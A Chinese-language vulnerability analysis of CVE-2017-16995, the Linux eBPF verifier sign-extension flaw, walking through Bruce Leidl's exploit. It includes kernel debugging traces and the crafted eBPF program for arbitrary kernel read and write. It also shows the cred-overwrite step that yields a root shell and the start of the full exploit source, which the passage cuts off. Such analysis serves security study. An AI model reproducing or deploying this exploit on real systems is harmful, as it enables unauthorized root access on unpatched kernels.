前言
关于这个漏洞网上已经有很多相关原理的分析,但大多主要以Vitaly Nikolenko的exp来分析,其中涉及了对exp中ebpf字节码进行逆向的问题,对于分析漏洞利用过程并不是十分直观。本篇文章以Bruce Leidl的exp进行分析,个人认为相比前者流程更加清晰直观,便于理解。
环境搭建
本次复现使用Linux kernel 4.4.33,在编译前开启CONFIG_BPF、CONFIG_BPF_SYSCALL(bpf()系统调用依赖该选项)和CONFIG_DEBUG_INFO。
extended BPF
eBPF(extended Berkeley Packet Filter)是内核源自于BPF的一套包过滤机制,eBPF的功能已经不仅仅局限于网络包过滤,利用它可以实现kernel tracing,traffic control,应用性能监控等强大功能。eBPF提供了一套类似RISC的指令集,并实现了该指令集的虚拟机,使用者通过内核API向eBPF提交指令代码来完成特定的功能。
eBPF虚拟指令系统属于RISC,拥有11个虚拟寄存器(r0-r10,其中r10为只读的帧指针),在实际运行时,虚拟机会把这11个寄存器一一对应于硬件CPU的11个物理寄存器,以x64为例,对应关系如下:
//R0 - 保存返回值
//R1-R5 参数传递
//R6-R9 保存临时变量
//R10 只读,用做栈指针
R0 – rax
R1 - rdi
R2 - rsi
R3 - rdx
R4 - rcx
R5 - r8
R6 - rbx
R7 - r13
R8 - r14
R9 - r15
R10 – rbp(帧指针,frame pointer)
每一条指令的格式如下:
//source/include/uapi/linux/bpf.h#L58
struct bpf_insn {
__u8 code; /* opcode */
__u8 dst_reg:4; /* dest register */
__u8 src_reg:4; /* source register */
__s16 off; /* signed offset */
__s32 imm; /* signed immediate constant */
};
例如BPF指令:BPF_MOV32_IMM(BPF_REG_9, 0xFFFFFFFF)
其数据结构为:
//source/include/linux/filter.h#L124
#define BPF_MOV32_IMM(DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU | BPF_MOV | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
转换成字节码为:\xb4\x09\x00\x00\xff\xff\xff\xff
。
可通过如下程序对eBPF字节码进行转换:
[1]https://github.com/dangokyo/CVE_2017_16995/blob/master/disassembler.c
[2]https://github.com/ret2p4nda/kernel-pwn/blob/master/CVE-2017-16995/epbf_tools.py
漏洞分析
简单来说漏洞点是在BPF模拟执行检测时的代码实现和实际运行时的代码实现不同,导致了经过构造的BPF指令绕过检测从而执行恶意代码。
verifier机制绕过
eBPF检测时(do_check() )
我们首先来看如何绕过eBPF的verifier机制,exp中代码如下:
/* Four-instruction prologue; the final line must not end with a line continuation. */
#define BPF_DISABLE_VERIFIER() \
	BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF), /* r2 = (u32)0xFFFFFFFF */ \
	BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0xFFFFFFFF, 2), /* if (r2 == -1) { */ \
	BPF_MOV64_IMM(BPF_REG_0, 0), /* exit(0); */ \
	BPF_EXIT_INSN() /* } */
第一行的eBPF操作码为BPF_ALU | BPF_MOV | BPF_K
,verifier 会对ALU指令用check_alu_op
函数进行检查。
该函数调用路径为:
#0 0xffffffff8116719b in check_alu_op (insn=<optimized out>, env=<optimized out>) at kernel/bpf/verifier.c:1097
#1 do_check (env=<optimized out>) at kernel/bpf/verifier.c:1765
#2 bpf_check (prog=<optimized out>, attr=<optimized out>) at kernel/bpf/verifier.c:2258
#3 0xffffffff81163d4e in bpf_prog_load (attr=0xffff88000d94fef0) at kernel/bpf/syscall.c:679
#4 0xffffffff8116456e in SYSC_bpf (size=48, uattr=<optimized out>, cmd=<optimized out>) at kernel/bpf/syscall.c:783
#5 SyS_bpf (cmd=5, uattr=140726845938864, size=72) at kernel/bpf/syscall.c:725
#6 0xffffffff817ef672 in entry_SYSCALL_64 () at arch/x86/entry/entry_64.S:185
该函数最后一个else
是将立即数赋值给寄存器,然而其并没有对BPF_ALU64|BPF_MOV|BPF_K
和BPF_ALU|BPF_MOV|BPF_K
两个指令做区分。直接把用户指令中的立即数insn->imm
赋值给了目的寄存器,insn->imm
和目的寄存器的类型都是int。
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────
RAX 0x90
RBX 0xffff88000d950018 ◂— 0
RCX 0x0
RDX 0xffffffff
RDI 0xffff88000d950018 ◂— 0
RSI 0xffff88000d9500a8 ◂— 8
R8 0xa
R9 0xfffc
R10 0xb
R11 0xffffc9000009301b ◂— 0xa /* '\n' */
R12 0x0
R13 0xffffc90000002028 ◂— 0xffffffff000009b4
R14 0xb0
R15 0xffff88000d950000 —▸ 0xffffc90000002000 ◂— 0x2900020001
RBP 0xffff88000d94fe18 —▸ 0xffff88000d94fed0 —▸ 0xffff88000d94ff48 —▸ 0x7ffd85a99d00 —▸ 0x7ffd85a99d10 ◂— ...
RSP 0xffff88000d94fd90 ◂— 0xffffffff
RIP 0xffffffff8116719b (bpf_check+6715) ◂— 0xca870ffffff237e9
──────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
0xffffffff81167187 <bpf_check+6695> movzx eax, byte ptr [r13 + 1]
0xffffffff8116718c <bpf_check+6700> mov edx, dword ptr [r13 + 4]
0xffffffff81167190 <bpf_check+6704> and eax, irq_stack_union+15 <15>
0xffffffff81167193 <bpf_check+6707> shl rax, 4 <4>
0xffffffff81167197 <bpf_check+6711> mov dword ptr [rbx + rax + 8], edx
► 0xffffffff8116719b <bpf_check+6715> jmp bpf_check+3191 <0xffffffff811663d7>
↓
0xffffffff811663d7 <bpf_check+3191> add r12d, 1
0xffffffff811663db <bpf_check+3195> jmp bpf_check+2633 <0xffffffff811661a9>
↓
0xffffffff811661a9 <bpf_check+2633> cmp dword ptr [rsp + 0x38], r12d
0xffffffff811661ae <bpf_check+2638> jle bpf_check+6091 <0xffffffff81166f2b>
0xffffffff811661b4 <bpf_check+2644> mov rax, qword ptr [rsp + 0x30]
────────────────────────────────────[ SOURCE (CODE) ]──────────────────────────────────────────
In file: /home/ivan/kernel/linux-4.4.33/kernel/bpf/verifier.c
1091 }
1092 } else {
1093 /* case: R = imm
1094 * remember the value we stored into this reg
1095 */
1096 regs[insn->dst_reg].type = CONST_IMM;
► 1097 regs[insn->dst_reg].imm = insn->imm;
1098 }
1099
1100 } else if (opcode > BPF_END) {
1101 verbose("invalid BPF_ALU opcode %x\n", opcode);
────────────────────────────────────────[ STACK ]──────────────────────────────────────────────
00:0000│ rsp 0xffff88000d94fd90 ◂— 0xffffffff
01:0008│ 0xffff88000d94fd98 ◂— jnp 0xffff88000d94fd3c /* 0xa27b */
02:0010│ 0xffff88000d94fda0 ◂— 0x95
03:0018│ 0xffff88000d94fda8 ◂— 0
04:0020│ 0xffff88000d94fdb0 ◂— add byte ptr [rax], al /* 0x800000000000 */
05:0028│ 0xffff88000d94fdb8 —▸ 0x6be540 ◂— 0
06:0030│ 0xffff88000d94fdc0 —▸ 0xffffc90000002028 ◂— 0xffffffff000009b4
07:0038│ 0xffff88000d94fdc8 —▸ 0xffff880000000029 ◂— xlatb /* 0x1ef000d71ef000d7 */
──────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────
► f 0 ffffffff8116719b bpf_check+6715
f 1 ffffffff8116719b bpf_check+6715
f 2 ffffffff8116719b bpf_check+6715
f 3 ffffffff81163d4e bpf_prog_load+590
f 4 ffffffff8116456e sys_bpf+846
f 5 ffffffff8116456e sys_bpf+846
f 6 ffffffff817ef672 entry_SYSCALL_64+98
───────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> x/10wx $rbx+$rax
0xffff88000d9500a8: 0x00000008 0x00000000 0xffffffff 0x00000000
0xffff88000d9500b8: 0x00000006 0x00000000 0x00000000 0x00000000
0xffff88000d9500c8: 0x00000000 0x00000000
$rbx+$rax
是 reg_state
结构体类型的reg
值,可见第一个字段值为8,第二个字段值为0xffffffff。结构体定义如下:
//kernel/bpf/verifier.c
struct reg_state {
enum bpf_reg_type type;
union {
/* valid when type == CONST_IMM | PTR_TO_STACK */
int imm;
/* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
* PTR_TO_MAP_VALUE_OR_NULL
*/
struct bpf_map *map_ptr;
};
};
//declaration of regs
struct reg_state *regs = state->regs
可以看到该结构体有2个字段,第一个为type,代表寄存器数据的类型,此处为CONST_IMM
,CONST_IMM
的值为8。另外一个为常量立即数的具体数值,可以看到类型为有符号整型(int)。
do_check()
在校验条件类跳转指令的时候,会判断条件是否成立,如果是非确定性跳转的话,就说明接下来2个分支都有可能执行(分支1和分支2),这时do_check()
会把下一步需要跳转到的指令编号(分支2)放到一个临时栈中备用,这样当前指令顺序校验(分支1)过程中遇到EXIT
指令时,会从临时栈中取出之前保存的下一条指令的序号(分支2)继续校验。如果跳转指令恒成立的话(即直通分支, fall-through branch ),就不会再往临时栈中放入分支2,因为分支2永远不会执行。
下面这段代码是对BPF_JMP|BPF_JNE|BPF_K
指令进行检查,这条指令的语义是:如果目的寄存器立即数==指令的立即数(insn->imm
),程序继续执行,否则执行pc+off
处的指令;注意判断立即数相等的条件,因为前面ALU指令对32bit和64bit integer不加区分,不论imm
是否有符号,在这里都是相等的。
//kernel/bpf/verifier.c#L1248
static int check_cond_jmp_op(struct verifier_env *env,
struct bpf_insn *insn, int *insn_idx)
{
struct reg_state *regs = env->cur_state.regs;
struct verifier_state *other_branch;
u8 opcode = BPF_OP(insn->code);
int err;
...
/* detect if R == 0 where R was initialized to zero earlier */
if (BPF_SRC(insn->code) == BPF_K &&
(opcode == BPF_JEQ || opcode == BPF_JNE) &&
regs[insn->dst_reg].type == CONST_IMM &&
regs[insn->dst_reg].imm == insn->imm) {
if (opcode == BPF_JEQ) {
/* if (imm == imm) goto pc+off;
* only follow the goto, ignore fall-through
*/
*insn_idx += insn->off;
return 0;
} else {
/* if (imm != imm) goto pc+off;
* only follow fall-through branch, since
* that's where the program will go
*/
return 0;
}
}
other_branch = push_stack(env, *insn_idx + insn->off + 1, *insn_idx);
...
}
下面代码,是在校验EXIT
指令时,会从临时栈中尝试取指令(调用pop_stack()
函数),如果临时栈中有指令,那就说明还有其他可能执行到的分支,需要继续校验,如果取不到值,表示当前这条EXIT
指令确实是BPF程序最后一条可以执行到的指令,此时pop_stack()
会返回-1,然后跳出do_check
校验循环,do_check
执行结束,校验通过。
//kernel/bpf/verifier.c#L1921
else if (class == BPF_JMP) {
u8 opcode = BPF_OP(insn->code);
...
} else if (opcode == BPF_EXIT) {
if (BPF_SRC(insn->code) != BPF_K ||
insn->imm != 0 ||
insn->src_reg != BPF_REG_0 ||
insn->dst_reg != BPF_REG_0) {
verbose("BPF_EXIT uses reserved fields\n");
return -EINVAL;
}
/* eBPF calling convetion is such that R0 is used
* to return the value from eBPF program.
* Make sure that it's readable at this time
* of bpf_exit, which means that program wrote
* something into it earlier
*/
err = check_reg_arg(regs, BPF_REG_0, SRC_OP);
if (err)
return err;
if (is_pointer_value(env, BPF_REG_0)) {
verbose("R0 leaks addr as return value\n");
return -EACCES;
}
process_bpf_exit:
insn_idx = pop_stack(env, &prev_insn_idx);
if (insn_idx < 0) {
break;
} else {
do_print_state = true;
continue;
}
}
...
}
eBPF运行时(__bpf_prog_run() )
运行第一行操作指令时,将操作码BPF_ALU | BPF_MOV | BPF_K
对应为ALU_MOV_K
。而64位的操作码BPF_ALU64|BPF_MOV|BPF_K
对应为ALU64_MOV_K
,定义代码如下:
//kernel/bpf/core.c
static const void *jumptable[256] = {
[0 ... 255] = &&default_label,
...
[BPF_ALU | BPF_MOV | BPF_K] = &&ALU_MOV_K,
...
[BPF_ALU64 | BPF_MOV | BPF_K] = &&ALU64_MOV_K,
...
};
...
ALU_MOV_K:
DST = (u32) IMM;
CONT;
...
ALU64_MOV_K:
DST = IMM;
CONT;
可以看出verifier检测时和eBPF运行时代码对于2条指令的语义解释并不一样,DST
是64位寄存器,因此ALU_MOV_K
得到的是一个32位的无符号整数,而ALU64_MOV_K
会对imm
进行符号扩展,得到一个64位有符号整数。
eBPF运行时对BPF_JMP|BPF_JNE|BPF_K
指令的解释
JMP_JNE_K:
if (DST != IMM) {
insn += insn->off;
CONT_JMP;
}
CONT;
当imm
为有符号和无符号时,由于符号扩展,DST!=IMM
结果是不一样的。
动态调试结果如下,可见实际执行时与模拟执行时跳转结果相反,最终执行了verifier未检查的eBPF代码。从而绕过了verifier检测机制。
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────
RAX 0x9
RBX 0xffffc90000002030 ◂— 0xffffffff00020955
RCX 0x0
RDX 0xffffffffffffffff
RDI 0xffff88000d961300 ◂— 0
RSI 0xffffffff
R8 0x0
R9 0x0
R10 0x0
R11 0xffff88000d929000 ◂— 0
R12 0xffffffff8182e720 (jumptable) —▸ 0xffffffff81162591 (__bpf_prog_run+81) ◂— 0x488182e700c6c748
R13 0x0
R14 0xffff88000d928c00 ◂— 0
R15 0xffff88000d94fdf0 ◂— 0
RBP 0xffff88000d94fce0 —▸ 0xffff88000d94fd20 —▸ 0xffff88000d94fdc0 —▸ 0xffff88000d94fde0 —▸ 0xffff88000d94fe50 ◂— ...
RSP 0xffff88000d94fa68 —▸ 0xffffea0000365fc0 ◂— 0x1fffff80000000
RIP 0xffffffff81162d2c (__bpf_prog_run+2028) ◂— 0xfffffd90c5943948
───────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
0xffffffff811631d0 <__bpf_prog_run+3216> movzx eax, byte ptr [rbx]
0xffffffff811631d3 <__bpf_prog_run+3219> jmp qword ptr [r12 + rax*8]
↓
0xffffffff81162d21 <__bpf_prog_run+2017> movzx eax, byte ptr [rbx + 1]
0xffffffff81162d25 <__bpf_prog_run+2021> movsxd rdx, dword ptr [rbx + 4]
0xffffffff81162d29 <__bpf_prog_run+2025> and eax, irq_stack_union+15 <15>
► 0xffffffff81162d2c <__bpf_prog_run+2028> cmp qword ptr [rbp + rax*8 - 0x270], rdx
0xffffffff81162d34 <__bpf_prog_run+2036> je __bpf_prog_run+4992 <0xffffffff811638c0>
0xffffffff81162d3a <__bpf_prog_run+2042> movsx rax, word ptr [rbx + 2]
0xffffffff81162d3f <__bpf_prog_run+2047> lea rbx, [rbx + rax*8 + 8]
0xffffffff81162d44 <__bpf_prog_run+2052> movzx eax, byte ptr [rbx]
0xffffffff81162d47 <__bpf_prog_run+2055> jmp qword ptr [r12 + rax*8]
────────────────────────────────────[ SOURCE (CODE) ]──────────────────────────────────────────
In file: /home/ivan/kernel/linux-4.4.33/kernel/bpf/core.c
491 insn += insn->off;
492 CONT_JMP;
493 }
494 CONT;
495 JMP_JNE_K:
► 496 if (DST != IMM) {
497 insn += insn->off;
498 CONT_JMP;
499 }
500 CONT;
501 JMP_JGT_X:
────────────────────────────────────────[ STACK ]──────────────────────────────────────────────
00:0000│ rsp 0xffff88000d94fa68 —▸ 0xffffea0000365fc0 ◂— 0x1fffff80000000
01:0008│ 0xffff88000d94fa70 ◂— 0
02:0010│ 0xffff88000d94fa78 —▸ 0xffff88000d961300 ◂— 0
03:0018│ 0xffff88000d94fa80 ◂— 0
04:0020│ 0xffff88000d94fa88 —▸ 0xffff88000fd5c8d8 ◂— 0xffff88000fd5c8d8
05:0028│ 0xffff88000d94fa90 —▸ 0xffff88000fa1a208 —▸ 0xffffea000006f460 —▸ 0xffffea000006f420 —▸ 0xffffea000006f3e0 ◂— ...
06:0030│ 0xffff88000d94fa98 —▸ 0xffff88000fd5c780 ◂— 0x1c4
07:0038│ 0xffff88000d94faa0 —▸ 0xffff88000d94fd20 —▸ 0xffff88000d94fdc0 —▸ 0xffff88000d94fde0 —▸ 0xffff88000d94fe50 ◂— ...
──────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────
► f 0 ffffffff81162d2c __bpf_prog_run+2028
f 1 ffffffff81700a1b sk_filter+91
f 2 ffffffff81700a1b sk_filter+91
f 3 ffffffff8178d2d5 unix_dgram_sendmsg+501
f 4 ffffffff816cec48 sock_sendmsg+56
f 5 ffffffff816cec48 sock_sendmsg+56
f 6 ffffffff816cece2 sock_write_iter+130
f 7 ffffffff811f7f09 __vfs_write+169
f 8 ffffffff811f7f09 __vfs_write+169
f 9 ffffffff811f8556 vfs_write+150
f 10 ffffffff811f9156 sys_write+70
───────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> x/wx $rbp+$rax*8-0x270
0xffff88000d94fab8: 0xffffffff
pwndbg> i r $rdx
rdx 0xffffffffffffffff -1
组装eBPF指令
在绕过verifier检测机制后,需要组装一个eBPF指令用来做任意地址的读写。
首先来看exp中的实现,如下:
/*
 * Four-instruction prologue. The last line deliberately has no trailing
 * backslash: a continuation there would splice the next #define into this
 * macro's body and break compilation.
 */
#define BPF_DISABLE_VERIFIER() \
	BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF), /* r2 = (u32)0xFFFFFFFF */ \
	BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0xFFFFFFFF, 2), /* if (r2 == -1) { */ \
	BPF_MOV64_IMM(BPF_REG_0, 0), /* exit(0); */ \
	BPF_EXIT_INSN() /* } */
/*
 * Eight-instruction sequence: store idx at fp-4, point r2 at it, call
 * BPF_FUNC_map_lookup_elem with r1 = r9, exit if r0 is 0, otherwise load
 * the 64-bit value r0 points to into dst. Expects r9 to already hold the map.
 */
#define BPF_MAP_GET(idx, dst) \
BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), /* r1 = r9 */ \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), /* r2 = fp */ \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), /* r2 = fp - 4 */ \
BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx), /* *(u32 *)(fp - 4) = idx */ \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), /* if (r0 == 0) */ \
BPF_EXIT_INSN(), /* exit(0); */ \
BPF_LDX_MEM(BPF_DW, (dst), BPF_REG_0, 0) /* r_dst = *(u64 *)(r0) */
/*
 * Build the instruction array and submit it with bpf_prog_load() as a
 * BPF_PROG_TYPE_SOCKET_FILTER program. Returns whatever bpf_prog_load()
 * returns. The program saves r1 at fp-16, reads map slots 0..2 into
 * r6/r7/r8 and dispatches on r6 (see the per-branch comments).
 */
static int load_prog() {
struct bpf_insn prog[] = {
BPF_DISABLE_VERIFIER(),
BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_1, -16), /* *(fp - 16) = r1 */
BPF_LD_MAP_FD(BPF_REG_9, mapfd), /* r9 = mapfd */
// The map's first element is the operation code, the second is the memory address to read or write, and the third holds the value that was read.
BPF_MAP_GET(0, BPF_REG_6), /* r6 = op */
BPF_MAP_GET(1, BPF_REG_7), /* r7 = address */
BPF_MAP_GET(2, BPF_REG_8), /* r8 = value */
/* store map slot address in r2 */
BPF_MOV64_REG(BPF_REG_2, BPF_REG_0), /* r2 = r0 */
BPF_MOV64_IMM(BPF_REG_0, 0), /* r0 = 0 for exit(0) */
BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 0, 2), /* if (op == 0) */
/* get fp */
BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_10, 0),
BPF_EXIT_INSN(),
BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 1, 3), /* else if (op == 1) */
/* get skbuff */
BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_10, -16),
BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),
BPF_EXIT_INSN(),
BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 2, 3), /* else if (op == 2) */
/* read */
BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_7, 0),
BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),
BPF_EXIT_INSN(),
/* else */
/* write */
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0),
BPF_EXIT_INSN(),
};
return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, sizeof(prog), "GPL", 0);
}
之前已经分析过BPF_DISABLE_VERIFIER()
的行为,继续往下分析。
首先将rax
存入rbp - 0x220
处,此处为exp中fp
的值。将rdi
存入rbp-0x268
处,此处为exp中BPF_REG_1
的值,并且rdi
在源码中的定义为struct sk_buff * skb
,这为后面覆写skb->sk->sk_peer_cred
提权做铺垫。
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────
RAX 0xb4
RBX 0xffffc90000002028 ◂— 0xffffffff000002b4
RCX 0x0
RDX 0xffff88000d9fc800 ◂— 0
RDI 0xffff88000da0e800 ◂— 0
RSI 0xffffc90000002028 ◂— 0xffffffff000002b4
R8 0x0
R9 0x0
R10 0x0
R11 0xffff88000d9fc800 ◂— 0
R12 0xffffffff8182e720 (jumptable) —▸ 0xffffffff81162591 (__bpf_prog_run+81) ◂— 0x488182e700c6c748
R13 0x0
R14 0xffff88000d9fc400 ◂— 0
R15 0xffff88000da0bdf0 ◂— 0
RBP 0xffff88000da0bce0 —▸ 0xffff88000da0bd20 —▸ 0xffff88000da0bdc0 —▸ 0xffff88000da0bde0 —▸ 0xffff88000da0be50 ◂— ...
RSP 0xffff88000da0ba68 —▸ 0xffffea0000368a40 ◂— 0x1fffff80000000
RIP 0xffffffff81162577 (__bpf_prog_run+55) ◂— 0xfffffd9085c748
───────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
0xffffffff8116255c <__bpf_prog_run+28> xor r13d, r13d
0xffffffff8116255f <__bpf_prog_run+31> sub rsp, irq_stack_union+608 <0x260>
0xffffffff81162566 <__bpf_prog_run+38> mov qword ptr [rbp - 0x220], rax
0xffffffff8116256d <__bpf_prog_run+45> movzx eax, byte ptr [rsi]
0xffffffff81162570 <__bpf_prog_run+48> mov qword ptr [rbp - 0x268], rdi
► 0xffffffff81162577 <__bpf_prog_run+55> mov qword ptr [rbp - 0x270], 0
0xffffffff81162582 <__bpf_prog_run+66> mov qword ptr [rbp - 0x238], 0
0xffffffff8116258d <__bpf_prog_run+77> jmp qword ptr [r12 + rax*8]
↓
0xffffffff811631ba <__bpf_prog_run+3194> movzx eax, byte ptr [rbx + 1]
0xffffffff811631be <__bpf_prog_run+3198> mov esi, dword ptr [rbx + 4]
0xffffffff811631c1 <__bpf_prog_run+3201> add rbx, 8 <8>
────────────────────────────────────[ SOURCE (CODE) ]──────────────────────────────────────────
In file: /home/ivan/kernel/linux-4.4.33/kernel/bpf/core.c
305
306 FP = (u64) (unsigned long) &stack[ARRAY_SIZE(stack)];
307 ARG1 = (u64) (unsigned long) ctx;
308
309 /* Registers used in classic BPF programs need to be reset first. */
► 310 regs[BPF_REG_A] = 0;
311 regs[BPF_REG_X] = 0;
312
313 select_insn:
314 goto *jumptable[insn->code];
315
────────────────────────────────────────[ STACK ]──────────────────────────────────────────────
00:0000│ rsp 0xffff88000da0ba68 —▸ 0xffffea0000368a40 ◂— 0x1fffff80000000
01:0008│ 0xffff88000da0ba70 ◂— 0
02:0010│ 0xffff88000da0ba78 —▸ 0xffff88000da0e800 ◂— 0
03:0018│ 0xffff88000da0ba80 —▸ 0xffff88000d96c770 ◂— 0
04:0020│ 0xffff88000da0ba88 —▸ 0xffff88000da0e800 ◂— 0
05:0028│ 0xffff88000da0ba90 ◂— 0x158
06:0030│ 0xffff88000da0ba98 —▸ 0xffff88000fd07e00 —▸ 0xffff88000fd06780 ◂— 0x1c4
07:0038│ 0xffff88000da0baa0 ◂— 1
──────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────
► f 0 ffffffff81162577 __bpf_prog_run+55
f 1 ffffffff81700a1b sk_filter+91
f 2 ffffffff81700a1b sk_filter+91
f 3 ffffffff8178d2d5 unix_dgram_sendmsg+501
f 4 ffffffff816cec48 sock_sendmsg+56
f 5 ffffffff816cec48 sock_sendmsg+56
f 6 ffffffff816cece2 sock_write_iter+130
f 7 ffffffff811f7f09 __vfs_write+169
f 8 ffffffff811f7f09 __vfs_write+169
f 9 ffffffff811f8556 vfs_write+150
f 10 ffffffff811f9156 sys_write+70
───────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> x/gx $rbp-0x220
0xffff88000da0bac0: 0xffff88000da0bcc8
pwndbg> x/gx 0xffff88000da0bcc8
0xffff88000da0bcc8: 0xffff88000da0e800
pwndbg> x/gx $rbp-0x268
0xffff88000da0ba78: 0xffff88000da0e800
BPF_MAP_GET
的主要流程为:将mapfd
放到r9
;将r9
放到r1
,作为后续调用BPF_FUNC_map_lookup_elem
函数的第一个参数;将fp
赋值给r2
;令r2减4,指向栈上fp-4处的4字节空间;将MAP元素的序号(idx
)写入fp-4处,即r2所指向的key
;以r2指向的key为参数调用BPF_FUNC_map_lookup_elem
并把返回值存入r0;判断BPF_FUNC_map_lookup_elem
是否执行成功(r0非0);成功后跳过EXIT,执行最后一条BPF_LDX_MEM指令,将取到的值放到目标寄存器(dst
)中。
后面定义了四个命令:1.获取fp
内核栈地址。2.获取sk_buff
地址。3.任意地址读。4.任意地址写。
提权
覆写sk
中的sk_peer_cred
使其内部与uid相关值置0。由于每个内核版本sk_peer_cred
偏移不同,可以先搜索sk_rcvtimeo = 9223372036854775807
找到其偏移再减8即为sk_peer_cred
的偏移。
pwndbg> p *((struct sk_buff *)0xffff88000da0e800)
$1 = {
{
{
next = 0x0 <irq_stack_union>,
prev = 0x0 <irq_stack_union>,
{
tstamp = {
tv64 = 0
},
skb_mstamp = {
{
v64 = 0,
{
stamp_us = 0,
stamp_jiffies = 0
}
}
}
}
},
rbnode = {
__rb_parent_color = 0,
rb_right = 0x0 <irq_stack_union>,
rb_left = 0x0 <irq_stack_union>
}
},
sk = 0xffff88000d9fc400,
...
}
pwndbg> p *((struct sock*)0xffff88000d9fc400)
$2 = {
...
sk_peer_pid = 0xffff88000d96cd00,
sk_peer_cred = 0xffff88000d9f9c00,
sk_rcvtimeo = 9223372036854775807,
sk_sndtimeo = 9223372036854775807,
...
}
运行结果:
/ $ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
/ $ ./get-rekt-linux-hardened
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
uid:3e8
[*] Leaking skbuff addr from ffff88000d9f9400
[*] Leaking sock struct from ffff88000da16400
[*] found sock->sk_rcvtimeo at offset 472
[*] found sock->sk_peer_cred
[*] hammering cred structure at ffff88000da10780
[*] credentials patched, launching shell...
/ # id
uid=0(root) gid=0(root) groups=1000(ctf)
EXP
完整exp如下:
#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <linux/bpf.h>
#include <linux/unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/stat.h>
#include <sys/personality.h>
/* Payload that writemsg() writes to sockets[0]; its contents are never set explicitly. */
char buffer[64];
/* Pair filled in by socketpair() in initialize(); the filter is attached to sockets[1]. */
int sockets[2];
/* File descriptors returned by bpf_create_map() and load_prog(). */
int mapfd, progfd;
/* When non-zero, redact() prints a fixed placeholder instead of its message. */
int doredact = 0;
/* Size of the log buffer handed to the kernel in bpf_prog_load(). */
#define LOG_BUF_SIZE 65536
char bpf_log_buf[LOG_BUF_SIZE];
/* Convert a pointer to the 64-bit integer representation used in bpf_attr fields. */
static __u64 ptr_to_u64(void *ptr)
{
	unsigned long raw = (unsigned long) ptr;

	return (__u64) raw;
}
/*
 * Submit an eBPF program with bpf(BPF_PROG_LOAD).
 *
 * prog_type    - program type passed through to the kernel
 * insns        - instruction array
 * prog_len     - size of insns in BYTES (converted to an instruction count)
 * license      - NUL-terminated license string
 * kern_version - stored in attr.kern_version
 *
 * The verifier log is requested at level 1 into the global bpf_log_buf,
 * which is reset to an empty string before the call.
 * Returns the syscall() result: a program fd, or -1 with errno set.
 */
int bpf_prog_load(enum bpf_prog_type prog_type,
		  const struct bpf_insn *insns, int prog_len,
		  const char *license, int kern_version)
{
	union bpf_attr attr;

	/*
	 * Zero the whole union explicitly. A designated initializer only
	 * guarantees the named member is initialized, while the kernel
	 * checks that bytes unused by the command are zero.
	 */
	memset(&attr, 0, sizeof(attr));
	attr.prog_type = prog_type;
	attr.insns = ptr_to_u64((void *) insns);
	attr.insn_cnt = prog_len / sizeof(struct bpf_insn);
	attr.license = ptr_to_u64((void *) license);
	attr.log_buf = ptr_to_u64(bpf_log_buf);
	attr.log_size = LOG_BUF_SIZE;
	attr.log_level = 1;
	attr.kern_version = kern_version;

	bpf_log_buf[0] = 0;
	return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}
/*
 * Create a BPF map with bpf(BPF_MAP_CREATE).
 *
 * map_flags is accepted but not forwarded to the kernel: this wrapper only
 * fills map_type, key_size, value_size and max_entries.
 * Returns the syscall() result: a map fd, or -1 with errno set.
 */
int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,
		   int max_entries, int map_flags)
{
	union bpf_attr attr;

	(void) map_flags;

	/* Zero every byte so fields the command does not use are really 0. */
	memset(&attr, 0, sizeof(attr));
	attr.map_type = map_type;
	attr.key_size = key_size;
	attr.value_size = value_size;
	attr.max_entries = max_entries;

	return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}
/*
 * Store *value under *key in map fd with bpf(BPF_MAP_UPDATE_ELEM).
